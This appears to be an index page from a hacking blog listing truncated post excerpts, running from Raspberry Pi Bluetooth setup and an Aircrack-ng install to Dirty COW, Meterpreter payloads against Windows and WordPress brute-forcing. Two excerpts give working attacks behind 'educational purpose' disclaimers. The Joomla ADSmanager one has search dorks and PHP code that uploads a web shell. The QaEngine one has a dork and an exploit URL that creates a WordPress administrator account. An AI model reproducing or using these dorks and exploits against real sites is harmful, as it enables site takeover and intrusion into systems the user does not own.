Bluetooth setup Raspberry pi

bluettoh_setup_raspberry_pi

Bluetooth setup Raspberry pi In this video you will learn how to setup bluetooth in raspberry pi using command line. You will be able to pair the bluetooth devices. Watch the video carefully to understand each step. Please give a like to my video and comment for any question. From[…] Continue reading

Aircrack-ng suit on raspberry pi

Aircrack-ng suit on raspberry pi In this Article we will learn how to install Aircrack-ng suit on raspberry pi. Let’s Follow me: Steps 1: Update the system. sudo apt-get update && sudo apt-get upgrade Steps 2: Upgrade firmware. sudo rpi-update Steps 3: Install dependencies. sudo apt-get install libssl-dev and sudo[…] Continue reading

Bruteforce wordpress using wpscan

bruteforce wordpress using wpscan

Bruteforce wordpress using wpscan In this video I will show how you can brutefoce wordpress based website using wpscan. Note: this video is only for educational purpose. For any Illegal activity hackaholic will not be held responsible. Plz Share FacebookGoogle+LinkedinTwitteremailRedditTumblrDiggBufferPrintPinterestStumbleUponFlattr

Dirty Cow (CVE-2016-5195) Privilege Escalation Demo

Dirty COW (CVE-2016-5195)

Dirty Cow (CVE-2016-5195) Privilege Escalation Demo. Dirty COW (CVE-2016-5195) is a privilege escalation vulnerability in the Linux Kernel. A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to[…] Continue reading

Meterpreter Session Hacking Windows 10

Meterpreter Session Hacking Windows 10 Goal: Hack windows 10, windows 8, windows 7, and windows xp. What you will Learn: How to use Msfvenom How to Start Msfconsole Meterpreter Basic Commands Step 1: Open terminal and type the following command to generate a payload. Now Payload is generated named my_virus.exe[…] Continue reading

Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability

Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability   Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org CODE PHP : <?php $url = “blabla.com/index.php?option=com_adsmanager&task=upload&tmpl=component”; // put URL Here $post = array ( “file” => “@shell.jpg”, “name” => “shell.php” ); $ch = curl_init (“$url“); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt ($ch, CURLOPT_USERAGENT, “Mozilla/5.0[…] Continue reading

WordPress QaEngine Theme Exploit – Add User Admin

WordPress QaEngine Theme Exploit – Add User Admin This video demonstrate how to exploit wordpress QaEngine theme. This Exploit add user with administrator role. Note: ONLY for Educational Purpose. Dork = inurl:wp-content/themes/qaengine Exploit = /wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=username&user_pass=password&role=administrator Note: For Any Illegal Activity Hackaholic will not be responsible. Only For Educational Purpose. Plz[…] Continue reading